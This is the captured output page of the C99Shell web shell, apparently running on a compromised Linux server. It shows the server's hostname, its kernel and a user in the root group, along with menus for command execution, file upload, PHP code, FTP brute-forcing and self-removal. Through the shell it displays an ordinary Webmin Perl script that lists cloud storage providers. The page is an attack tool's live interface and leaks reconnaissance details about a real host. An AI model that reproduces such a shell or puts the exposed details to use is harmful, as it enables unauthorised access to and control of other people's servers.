!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/virtual-server/   drwxrwxr-x
Free 28.58 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     list_clouds.cgi (1 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show a list of cloud storage providers

$trust_unknown_referers = 1;
require './virtual-server-lib.pl';
&ReadParse();
&can_cloud_providers() || &error($text{'clouds_ecannot'});

&ui_print_header(undef, $text{'clouds_title'}, "", undef);

&list_clouds_pro_tip();

@provs = &list_cloud_providers();
print &ui_columns_start([ $text{'clouds_name'},
              $text{'clouds_url'},
              $text{'clouds_state'},
              $text{'clouds_users'} ]);
@allbackups = &list_scheduled_backups();
foreach my $p (@provs) {
    @users = grep { &backup_uses_cloud($_, $p) } @allbackups;
    $users = @users ? &text('clouds_nusers', scalar(@users))
            : $text{'clouds_nousers'};
    $sfunc = "cloud_".$p->{'name'}."_get_state";
    $state = &$sfunc($p);
    print &ui_columns_row([
        &ui_link("edit_cloud.cgi?name=$p->{'name'}", $p->{'desc'}),
        &ui_link($p->{'url'}, $p->{'url'}, undef, "target=_blank"),
        $state->{'ok'} ? $state->{'desc'} : $text{'clouds_unconf'},
        $users ]);
    }
print &ui_columns_end();

&ui_print_footer("", $text{'index_return'});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--